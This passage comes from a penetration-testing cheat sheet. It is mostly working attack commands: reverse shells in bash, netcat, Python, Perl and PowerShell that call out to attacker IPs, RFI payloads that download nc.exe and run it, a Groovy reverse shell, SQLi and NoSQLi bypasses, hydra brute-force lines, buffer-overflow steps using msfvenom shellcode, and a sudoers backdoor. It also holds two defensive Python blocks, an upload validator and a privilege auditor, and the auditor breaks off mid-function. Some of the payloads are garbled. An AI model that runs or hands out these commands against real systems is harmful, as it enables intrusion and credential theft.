778 | dirsearch -r -f -u https://crm.comprarcasa.pt --extensions=htm,html,asp,aspx,txt -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt --request-by-hostname -t 40
779 |
780 | #IIS
781 | #ViewState:
782 | https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC
783 |
784 | #WebResource.axd:
785 | https://github.com/inquisb/miscellaneous/blob/master/ms10-070_check.py
786 |
787 | #ShortNames
788 | https://github.com/irsdl/IIS-ShortName-Scanner
789 | java -jar iis_shortname_scanner.jar 2 20 http://domain.es
790 |
791 | #Jenkins
792 | JENKINSIP/PROJECT//securityRealm/user/admin
793 | JENKINSIP/jenkins/script
794 |
795 | #Groovy RCE
796 | def process = "cmd /c whoami".execute();println "${process.text}";
797 | #Groovy RevShell
798 | String host="localhost";
799 | int port=8044;
800 | String cmd="cmd.exe";
801 | Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
802 |
807 | # PHP bypass disable_functions and open_basedir
808 | # Chankro
809 | https://github.com/TarlogicSecurity/Chankro
810 | python2 chankro.py --arch 64 --input rev.sh --output chan.php --path /var/www/html
811 |
812 | # Padding oracle on cookies (padbuster):
813 | # Get cookie structure
814 | padbuster http://10.10.1.111/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "user=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding"
815 | # Get cookie for other user (impersonation)
816 | padbuster http://10.10.1.111/index.php xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka 8 -cookies "user=xDwqvSF4SK1BIqPxM9fiFxnWmF+wjfka" -error "Invalid padding" -plaintext 'user=administratorme'
817 | ```
818 |
819 |
820 | ### Default/Weak login
821 |
822 | Search documentation for default passwords and test them
823 |
824 | ```
825 | site:webapplication.com password
826 | ```
827 |
828 | ```
829 | admin admin
830 | admin password
831 | admin
832 | admin
833 | root root
834 | root admin
835 | root password
836 | root
837 | password
838 | admin
839 | username
840 | username
841 | ```
842 |
843 |
844 | ### LFI/RFI
845 |
846 |
847 | ```
848 | fimap -u "http://10.11.1.111/example.php?test="
849 |
850 | # Ordered output
851 | curl -s http://10.11.1.111/gallery.php?page=/etc/passwd
852 | /root/Tools/Kadimus/kadimus -u http://10.11.1.111/example.php?page=
853 |
854 | http://10.11.1.111/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd && base64 -d savefile.php
855 | http://10.11.1.111/page=http://10.11.1.111/maliciousfile.txt%00 or ?
856 | ?page=php://filter/convert.base64-encode/resource=../config.php
857 | ../../../../../boot.ini
858 |
859 | amap -d 10.11.1.111 8000
860 |
861 | # LFI Windows
862 | http://10.11.1.111/addguestbook.php?LANG=../../windows/system32/drivers/etc/hosts%00
863 |
864 | # Contaminating log files
865 | root@kali:~# nc -v 10.11.1.111 80
866 | 10.11.1.111: inverse host lookup failed: Unknown host
867 | (UNKNOWN) [10.11.1.111] 80 (http) open
868 |
869 |
870 | http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig
871 |
872 | # RFI:
873 | http://10.11.1.111/addguestbook.php?LANG=http://10.11.1.111:31/evil.txt%00
874 | Content of evil.txt:
875 |
876 |
877 | # PHP Filter:
878 | http://10.11.1.111/index.php?m=php://filter/convert.base64-encode/resource=config
879 |
880 | # RFI over SMB (Windows)
881 | cat php_cmd.php
882 |
883 | - Start SMB Server in attacker machine and put evil script
884 | - Access it via browser (2 request attack):
885 | - http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c Invoke-WebRequest -Uri "http://10.10.14.42/nc.exe" -OutFile "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe"
886 | - http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe" -e cmd.exe ATTACKER_IP 1234
887 |
888 | ```
889 |
890 | ### SQL-Injection
891 |
892 | ```
893 | # References
894 | https://www.exploit-db.com/papers/17934
895 | https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
896 |
897 | # Post
898 | ./sqlmap.py -r search-test.txt -p tfUPass
899 |
900 | # Get
901 | sqlmap -u "http://10.11.1.111/index.php?id=1" --dbms=mysql
902 |
903 | # Crawl
904 | sqlmap -u http://10.11.1.111 --dbms=mysql --crawl=3
905 |
906 | # Full auto - THE GOOD ONE
907 | sqlmap -u 'http://10.11.1.111:1337/978345210/index.php' --forms --dbs --risk=3 --level=5 --threads=4 --batch
908 | # Columns
909 | sqlmap -u 'http://admin.cronos.htb/index.php' --forms --dbms=MySQL --risk=3 --level=5 --threads=4 --batch --columns -T users -D admin
910 | # Values
911 | sqlmap -u 'http://admin.cronos.htb/index.php' --forms --dbms=MySQL --risk=3 --level=5 --threads=4 --batch --dump -T users -D admin
912 |
913 | sqlmap -o -u "http://10.11.1.111:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" --method=POST --level=3 --threads=10 --dbms=MySQL --users --passwords
914 |
915 | # NoSQL
916 | ' || 'a'=='a
917 | mongodbserver:port/status?text=1
918 |
919 | #in URL
920 | username[$ne]=toto&password[$ne]=toto
921 |
922 | #in JSON
923 | {"username": {"$ne": null}, "password": {"$ne": null}}
924 | {"username": {"$gt":""}, "password": {"$gt":""}}
925 | ```
926 |
927 | ### SSRF
928 |
929 | A web app that makes requests to external IPs: make it call 127.0.0.1:8080 / 10.1.10.111 instead, to enumerate the internal network.
930 |
931 | ```
932 | chat:3000/ssrf?user=&comment=&link=http://127.0.0.1:3000
933 | GET /ssrf?user=&comment=&link=http://127.0.0.1:3000 HTTP/1.1
934 | ```
935 |
936 | Ports can be enumerated the same way.
935 |
936 | ### XSS
937 |
938 | ```
939 | https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html?m=1
940 | ```
941 |
942 | ### XXE
943 |
944 | ```
945 | # XML input that the server parses: in the DOCTYPE, declare an entity as SYSTEM "file:///etc/passwd"
946 |
947 | Instead POST:
948 |
949 | ]>
950 | Hack The &book;
951 |
952 | Malicious XML:
953 |
954 | ]>Hack The
955 | %26book%3B
956 |
957 | XXE OOB
958 |
959 | %dtd;]>
960 | %26send%3B
961 | ```
973 |
974 | ### Sql-login-bypass
975 |
976 | - Open Burp-suite
977 | - Make and intercept a request
978 | - Send to intruder
979 | - Cluster attack.
980 | - Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html)
981 | - Attack
982 | - Check for response length variation
983 |
984 | ### Bypass image upload restrictions
985 |
986 | ```
987 | - Change extension: .pHp3 or pHp3.jpg
988 | - Modify mimetype: Content-type: image/jpeg
989 | - Bypass getimagesize(): exiftool -Comment='"; system($_GET['cmd']); ?>' file.jpg
990 | - Add gif header: GIF89a;
991 | - All at the same time.
992 | ```
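Server-side validation that holds up against every item in that list, added here as an example (it is not code from the cheat sheet). Function names, reason strings and the sample uploads are constructed; the `Content-Type` argument is accepted only to show that it is ignored.

```python
"""Upload validator: each check alone is bypassed by one trick in the list above,
together they refuse all of them.  Example code, not part of the original page."""
import re
import secrets

# Allowed extensions and the magic bytes the file content must start with.
ALLOWED_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Inner extensions that a misconfigured handler may still pass to an interpreter
# when they appear before the final, harmless-looking extension.
INNER_EXT_BLOCKLIST = re.compile(r"^(php\d*|phtml|phar|asp|aspx|jsp|jspx|cgi|pl|sh|htaccess)$")
# Interpreter markers a real image never needs.  This scan is a heuristic; re-encoding
# the image (e.g. with Pillow) is the robust form of this step.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%@")


class UploadRejected(ValueError):
    """Raised with a short reason code the caller can log."""


def validate_upload(filename: str, declared_content_type: str, data: bytes) -> str:
    """Return a server-generated file name, or raise UploadRejected.

    declared_content_type is deliberately never read: the client controls that
    header, so trusting 'Content-Type: image/jpeg' is exactly the bypass listed.
    """
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise UploadRejected("no-extension")         # also refuses ".htaccess"
    ext = parts[-1]
    if ext not in ALLOWED_MAGIC:
        raise UploadRejected("bad-extension")        # shell.php, shell.pHp3
    for inner in parts[1:-1]:
        if INNER_EXT_BLOCKLIST.match(inner):
            raise UploadRejected("inner-extension")  # shell.pHp3.jpg, shell.php.gif
    if not data.startswith(ALLOWED_MAGIC[ext]):
        raise UploadRejected("magic-mismatch")       # GIF89a header on a .jpg
    if any(marker in data.lower() for marker in SCRIPT_MARKERS):
        raise UploadRejected("script-marker")        # code hidden in an EXIF comment
    # Never reuse the client's name: random name plus the vetted extension.  Store
    # the file outside the web root or where script execution is disabled.
    return f"{secrets.token_hex(16)}.{ext}"


def demo_cases() -> dict:
    """Run the tricks from the list (constructed samples) through the validator."""
    marker = b"<?php /* constructed test marker, not a payload */ ?>"
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 12
    cases = {
        "double-extension": ("shell.pHp3.jpg", "image/jpeg", jpeg),
        "spoofed-content-type": ("shell.php", "image/jpeg", marker),
        "exif-comment": ("pic.jpg", "image/jpeg", b"\xff\xd8\xff\xe1Exif\x00\x00" + marker),
        "gif-header-wrong-ext": ("shell.jpg", "image/jpeg", b"GIF89a;" + marker),
        "gif-header-with-payload": ("shell.gif", "image/gif", b"GIF89a;" + marker),
        "clean-png": ("cat.png", "text/plain", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8),
    }
    results = {}
    for label, (name, ctype, body) in cases.items():
        try:
            results[label] = ("accepted", validate_upload(name, ctype, body))
        except UploadRejected as exc:
            results[label] = ("rejected", str(exc))
    return results


if __name__ == "__main__":
    for label, (verdict, detail) in demo_cases().items():
        print(f"{label:24s} {verdict:8s} {detail}")
```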
993 |
994 | ## Password brute force - last resort
995 |
996 | Offline local resources
997 |
998 | ```
999 | cewl
1000 | hash-identifier
1001 | john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
1002 | medusa -h 10.11.1.111 -u admin -P password-file.txt -M http -m DIR:/admin -T 10
1003 | ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.111
1004 | crowbar -b rdp -s 10.11.1.111/32 -u victim -C /root/words.txt -n 1
1005 | hydra -l root -P password-file.txt 10.11.1.111 ssh
1006 | hydra -P password-file.txt -v 10.11.1.111 snmp
1007 | hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 10.11.1.111 ftp -V
1008 | hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 10.11.1.111 pop3 -V
1009 | hydra -P /usr/share/wordlists/nmap.lst 10.11.1.111 smtp -V
1010 |
1011 | # SIMPLE LOGIN GET
1012 | hydra -L cewl_fin_50.txt -P cewl_fin_50.txt 10.11.1.111 http-get-form "/~login:username=^USER^&password=^PASS^&Login=Login:Unauthorized" -V
1013 |
1014 | # GET FORM with HTTPS
1015 | hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.11.1.111 -s 443 -S https-get-form "/index.php:login=^USER^&password=^PASS^:Incorrect login/password\!"
1016 |
1017 | # SIMPLE LOGIN POST
1018 | hydra -l root@localhost -P cewl 10.11.1.111 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I
1019 |
1020 | # API REST LOGIN POST
1021 | hydra -l admin -P /usr/share/wordlists/wfuzz/others/common_pass.txt -V -s 80 10.11.1.111 http-post-form "/centreon/api/index.php?action=authenticate:username=^USER^&password=^PASS^:Bad credentials" -t 64
1022 |
1023 | # Dictionary creation
1024 | https://github.com/LandGrey/pydictor
1025 | https://github.com/Mebus/cupp
1026 | git clone https://github.com/sc0tfree/mentalist.git
1027 | ```
1028 |
1029 | Online crackers
1030 |
1031 | ```
1032 | https://hashkiller.co.uk/Cracker
1033 | https://www.cmd5.org/
1034 | https://www.onlinehashcrack.com/
1035 | https://gpuhash.me/
1036 | https://crackstation.net/
1037 | https://crack.sh/
1038 | https://hash.help/
1039 | https://passwordrecovery.io/
1040 | http://cracker.offensive-security.com/
1041 | ```
1042 |
1043 | # **Vulnerability analysis**
1044 |
1045 | ## BOF
1046 |
1047 | ```
1048 | # BASIC GUIDE
1049 | 1. Send "A"*1024
1050 | 2. Replace "A" with /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l LENGTH
1051 | 3. When it crashes: "!mona findmsp" (EIP offset) or "/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q TEXT" or "!mona pattern_offset eip"
1052 | 4. Confirm the location with "B" and "C"
1053 | 5. Check for badchars instead of CCCC (ESP):
1054 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
1055 | with script _badchars.py and
1056 | "!mona compare -a esp -f C:\Users\IEUser\Desktop\badchar_test.bin"
1057 | 5.1 AWESOME WAY TO CHECK BADCHARS (https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/):
1058 | a. !mona config -set workingfolder c:\logs\%p
1059 | b. !mona bytearray -b "\x00\x0d"
1060 | c. Copy from c:\logs\%p\bytearray.txt to python exploit and run again
1061 | d. !mona compare -f C:\logs\%p\bytearray.bin -a 02F238D0 (ESP address)
1062 | e. In " data", before unicode chars it shows badchars.
1063 | 6. Find JMP ESP with "!mona modules" or "!mona jmp -r esp" or "!mona jmp -r esp -cpb '\x00\x0a\x0d'" find one with security modules "FALSE"
1064 |
1065 | 6.1 Then, "!mona find -s "\xff\xe4" -m PROGRAM/DLL-FALSE"
1066 | 6.2 Remember to put the JMP ESP address in reverse byte order (little-endian): 5F4A358F becomes \x8f\x35\x4a\x5f
1067 |
1068 |
1069 | 7. Generate shellcode and place it:
1070 | msfvenom -p windows/shell_reverse_tcp LHOST=10.11.1.111 LPORT=4433 -f python -e x86/shikata_ga_nai -b "\x00"
1071 |
1072 | msfvenom -p windows/shell_reverse_tcp lhost=10.11.1.111 lport=443 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -f python -v shellcode
1073 |
1074 | 8. Final buffer like:
1075 | buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
1076 |
1077 | ```
1078 |
1079 |
1080 |
1081 | ```
1082 | ################ sample 1 ################################################
1083 | #!/usr/bin/env python3
1084 |
1085 | import socket, sys
1086 |
1087 | if len(sys.argv) != 3:
1088 |     print("usage: python fuzzer.py 10.11.1.111 PORT")
1089 |     sys.exit(1)
1090 |
1091 | payload = b"A" * 1000
1092 |
1093 | ipAddress = sys.argv[1]
1094 | port = int(sys.argv[2])
1095 |
1096 | try:
1097 |     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
1098 |     s.connect((ipAddress, port))
1099 |     s.recv(1024)          # read the service banner first
1100 |     print("Sending payload")
1101 |     s.send(payload)
1102 |     print("Done")
1103 |     s.close()
1104 | except OSError as e:
1105 |     print("Error:", e)
1106 |     sys.exit(0)
1107 |
1108 | ################ sample 2 ################################################
1109 | #!/usr/bin/env python3
1110 | import sys
1111 | import socket as so
1112 |
1113 | try:
1114 |     server = sys.argv[1]
1115 |     port = 5555
1116 | except IndexError:
1117 |     print("[+] Usage %s host" % sys.argv[0])
1118 |     sys.exit()
1119 |
1120 | req1 = b"AUTH " + b"\x41" * 1072
1121 | s = so.socket(so.AF_INET, so.SOCK_STREAM)
1122 | try:
1123 |     s.connect((server, port))
1124 |     print(repr(s.recv(1024)))
1125 |     s.send(req1)
1126 |     print(repr(s.recv(1024)))
1127 | except OSError:
1128 |     print("[!] connection refused, check debugger")
1129 | s.close()
1130 | ```
1131 |
1132 |
1133 |
1134 | ## Find exploits - Searchsploit and Google
1135 |
1136 | When there are many exploits for a piece of software, use Google; it sorts the results by popularity.
1137 |
1138 | ```bash
1139 | site:exploit-db.com apache 2.4.7
1140 |
1141 | # Remove dos-exploits
1142 |
1143 | searchsploit Apache 2.4.7 | grep -v '/dos/'
1144 | searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat"
1145 |
1146 | # Only search the title (exclude the path), add the -t
1147 | searchsploit -t Apache | grep -v '/dos/'
1148 | ```
1149 |
1150 | ## Reverse Shells
1151 |
1152 | ```bash
1153 | # Linux
1154 | bash -i >& /dev/tcp/10.11.1.111/4443 0>&1
1155 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.1.111 4443 >/tmp/f
1156 | nc -e /bin/sh 10.11.1.111 4443
1157 |
1158 | # Python
1159 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.1.111",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
1160 |
1161 | __import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4433 >/tmp/f')-1\
1162 |
1163 | # Perl
1164 | perl -e 'use Socket;$i="10.11.1.111";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
1165 |
1166 | # Windows
1167 | nc -e cmd.exe 10.11.1.111 4443
1168 | powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.11',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
1169 |
1170 | # PHP most simple Linux
1171 | $sock, 1=>$sock, 2=>$sock), $pipes);?>
1172 | ```
1173 |
1174 | # **Privilege escalation**
1175 |
1176 | ## Common
1177 |
1178 | ```
1179 | # Docker
1180 | https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/
1181 |
1182 | ```
1183 |
1184 | ### Set up Webserver
1185 |
1186 | ```
1187 | python -m SimpleHTTPServer 8080
1188 | https://github.com/sc0tfree/updog
1189 | updog
1190 | ```
1191 |
1192 | ### Set up FTP Server
1193 |
1194 | ```
1195 | # Install pyftpdlib
1196 | pip install pyftpdlib
1197 |
1198 | # Run (-w flag allows anonymous write access)
1199 | python -m pyftpdlib -p 21 -w
1200 | ```
1201 |
1202 | ### Set up TFTP
1203 |
1204 | ```
1205 | # In Kali
1206 | atftpd --daemon --port 69 /tftp
1207 |
1208 | # In reverse Windows
1209 | tftp -i 10.11.1.111 GET nc.exe
1210 | nc.exe -e cmd.exe 10.11.1.111 4444
1211 |
1212 | http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=nc.exe%20-e%20cmd.exe%2010.11.0.105%204444
1213 | ```
1214 |
1215 | ## Linux
1216 |
1217 | Now we start the whole enumeration process over again.
1218 |
1219 | - Kernel exploits
1220 | - Programs running as root
1221 | - Installed software
1222 | - Weak/reused/plaintext passwords
1223 | - Inside service
1224 | - Suid misconfiguration
1225 | - World writable scripts invoked by root
1226 | - Unmounted filesystems
1227 | - Look in /var/backups
1228 | - Look in /etc/fstab and in the output of mount
1229 |
1230 | Less likely
1231 |
1232 | - Private ssh keys
1233 | - Bad path configuration
1234 | - Cronjobs
1235 |
1236 | ### Useful commands
1237 |
1238 | ```
1239 | # Spawning shell
1240 | python -c 'import pty; pty.spawn("/bin/bash")'
1241 | python -c 'import pty; pty.spawn("/bin/sh")'
1242 |
1243 | # Upgrade to a full TTY: background the shell, fix the local terminal, foreground it again
1244 | Ctrl+Z
1245 | stty raw -echo
1246 | fg
1247 | reset
1248 | # Match the terminal size to the local one (check it locally with stty size)
1249 | Ctrl+Z
1250 | stty size
1251 | stty rows 48 columns 120
1252 | fg
1251 |
1252 | echo os.system('/bin/bash')
1253 | /bin/sh -i
1254 | perl -e 'exec "/bin/sh";'
1255 | perl: exec "/bin/sh";
1256 | ruby: exec "/bin/sh"
1257 | lua: os.execute('/bin/sh')
1258 | (From within vi)
1259 | :!bash
1260 | :set shell=/bin/bash:shell
1261 | (From within nmap)
1262 | !sh
1263 |
1264 | # Access to more binaries
1265 | export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
1266 |
1267 | # Set up webserver
1268 | cd /root/oscp/useful-tools/privesc/linux/privesc-scripts; python -m SimpleHTTPServer 8080
1269 |
1270 | # Download all files
1271 | wget http://10.11.1.111:8080/ -r; mv 10.11.1.111:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linprivchecker.py unix-privesc-check
1272 |
1273 | ./LinEnum.sh -t -k password -r LinEnum.txt
1274 | python linprivchecker.py extended
1275 | ./unix-privesc-check standard
1276 |
1277 | # Writable directories
1278 | /tmp
1279 | /var/tmp
1280 |
1281 | # Add user to sudoers
1282 | useradd hacker
1283 | passwd hacker
1284 | echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers
1285 | ```
1286 |
1287 | ### Basic info
1288 |
1289 | ```
1290 | uname -a
1291 | env
1292 | id
1293 | cat /proc/version
1294 | cat /etc/issue
1295 | cat /etc/passwd
1296 | cat /etc/group
1297 | cat /etc/shadow
1298 | cat /etc/hosts
1299 |
1300 | # Users with login
1301 | grep -vE "nologin" /etc/passwd
1302 |
1303 | # Priv Enumeration Scripts
1304 | upload /unix-privesc-check
1305 | upload /root/Desktop/Backup/Tools/Linux_privesc_tools/linuxprivchecker.py ./
1306 | upload /root/Desktop/Backup/Tools/Linux_privesc_tools/LinEnum.sh ./
1307 |
1308 | python linprivchecker.py extended
1309 | ./LinEnum.sh -t -k password
1310 | unix-privesc-check
1311 | ```
1312 |
1313 | ### Kernel exploits
1314 |
1315 | ```
1316 | site:exploit-db.com kernel version
1317 |
1318 | perl /root/oscp/useful-tools/privesc/linux/Linux_Exploit_Suggester/Linux_Exploit_Suggester.pl -k 2.6
1319 |
1320 | python linprivchecker.py extended
1321 | ```
1322 |
1323 | ### Programs running as root
1324 |
1325 | Look for webserver, mysql or anything else like that.
1326 |
1327 | ```
1328 | # Metasploit
1329 | ps
1330 |
1331 | # Linux
1332 | ps aux
1333 | ```
1334 |
1335 | ### Installed software
1336 |
1337 | ```
1338 | /usr/local/
1339 | /usr/local/src
1340 | /usr/local/bin
1341 | /opt/
1342 | /home
1343 | /var/
1344 | /usr/src/
1345 |
1346 | # Debian
1347 | dpkg -l
1348 |
1349 | # CentOS, OpenSuse, Fedora, RHEL
1350 | rpm -qa (CentOS / openSUSE )
1351 |
1352 | # OpenBSD, FreeBSD
1353 | pkg_info
1354 | ```
1355 |
1356 | ### Weak/reused/plaintext passwords
1357 |
1358 | - Check database config-file
1359 | - Check databases
1360 | - Check weak passwords
1361 |
1362 | ```
1363 | username:username
1364 | username:username1
1365 | username:root
1366 | username:admin
1367 | username:qwerty
1368 | username:password
1369 | ```
1370 |
1371 | - Check plaintext
1372 |
1373 | ```
1374 | ./LinEnum.sh -t -k password
1375 | ```
1376 |
1377 | ### Inside service
1378 |
1379 | ```
1380 | # Linux
1381 | netstat -anlp
1382 | netstat -ano
1383 | ```
1384 |
1385 | ### Suid misconfiguration
1386 |
1387 | Binaries with the SUID bit set can be run by any user, but they execute with the privileges of the file's owner: for root-owned binaries, that means as root.
1388 |
1389 | Example programs:
1390 |
1391 | ```
1392 | nmap
1393 | vim
1394 | nano
1395 | ```
1396 |
1397 | ```
1398 | # SUID
1399 | find / -perm -4000 -type f 2>/dev/null
1400 |
1401 | # ALL PERMS
1402 | find / -perm -777 -type f 2>/dev/null
1403 |
1404 | # SUID files owned by the current user
1405 | find / -perm /u=s -user `whoami` 2>/dev/null
1406 | # SUID files owned by root
1407 | find / -user root -perm -4000 -print 2>/dev/null
1408 |
1409 | # Writables for current user/group
1410 | find / -perm /u=w -user `whoami` 2>/dev/null
1411 | find / -perm /u+w,g+w -type f -user `whoami` 2>/dev/null
1412 | find / -perm /u+w -user `whoami` 2>/dev/null
1413 |
1414 | # Dirs with +w perms for current u/g
1415 | find / -perm /u=w -type d -user `whoami` 2>/dev/null
1416 | find / -perm /u+w,g+w -type d -user `whoami` 2>/dev/null
1416 | ```
1417 |
1418 | ### Unmounted filesystems
1419 |
1420 | Here we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc process over again.
1421 |
1422 | ```
1423 | mount -l
1424 | ```
1425 |
1426 | ### Cronjob
1427 |
1428 | Look for anything owned by a privileged user but writable by you.
1429 |
1430 | ```
1431 | crontab -l
1432 | ls -alh /var/spool/cron
1433 | ls -al /etc/ | grep cron
1434 | ls -al /etc/cron*
1435 | cat /etc/cron*
1436 | cat /etc/at.allow
1437 | cat /etc/at.deny
1438 | cat /etc/cron.allow
1439 | cat /etc/cron.deny
1440 | cat /etc/crontab
1441 | cat /etc/anacrontab
1442 | cat /var/spool/cron/crontabs/root
1443 | ```
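The SUID and cronjob checks above, run as one script instead of by hand, as an added example (not a tool from the cheat sheet): it walks a tree without following symlinks, flags SUID/SGID files (separating the usual system ones from unexpected ones) and files owned by a privileged uid that other users can write. The expected-SUID set, the system bin directories and the temporary sample tree are assumptions constructed here.

```python
"""Audit a tree for SUID/SGID binaries and privileged-owned writable files.
Example code for this cheat sheet, not part of the original.  Run on a live
system as: python3 privaudit.py /   (privileged uid defaults to 0 = root)."""
import os
import stat
import sys
import tempfile
from dataclasses import dataclass, field

# SUID binaries a stock Linux install normally carries, and the directories they live in.
EXPECTED_SUID = frozenset({"su", "sudo", "passwd", "chsh", "chfn", "gpasswd", "newgrp",
                           "mount", "umount", "ping", "fusermount"})
SYSTEM_BIN_DIRS = frozenset({"/bin", "/sbin", "/usr/bin", "/usr/sbin"})
PSEUDO_FS = frozenset({"/proc", "/sys", "/dev", "/run"})   # not descended when auditing /


@dataclass
class Finding:
    path: str
    kind: str   # "suid", "suid-expected", "sgid" or "priv-writable"
    mode: str   # permission bits in octal, e.g. "4755"
    uid: int


@dataclass
class Report:
    findings: list = field(default_factory=list)

    def of_kind(self, kind: str) -> list:
        return sorted(f.path for f in self.findings if f.kind == kind)


def classify(path: str, rel_dir: str, mode: int, uid: int, privileged_uids: set) -> list:
    """Findings for one regular file.  rel_dir is its directory relative to the audit
    root ("/usr/bin" whether the root is "/" or a test tree), mode the 12 permission
    bits, uid the owner."""
    out = []
    name = os.path.basename(path)
    if mode & stat.S_ISUID:
        known = name in EXPECTED_SUID and rel_dir in SYSTEM_BIN_DIRS
        out.append(Finding(path, "suid-expected" if known else "suid", f"{mode:04o}", uid))
    if mode & stat.S_ISGID:
        out.append(Finding(path, "sgid", f"{mode:04o}", uid))
    # "Owned by a privileged user but writable for you": cron or init scripts that root
    # later executes.  A group or world write bit is enough to flag the file.
    if uid in privileged_uids and mode & (stat.S_IWGRP | stat.S_IWOTH):
        out.append(Finding(path, "priv-writable", f"{mode:04o}", uid))
    return out


def audit_tree(root: str, privileged_uids=(0,)) -> Report:
    """Walk root without following symlinks and classify every regular file."""
    report = Report()
    privileged = set(privileged_uids)
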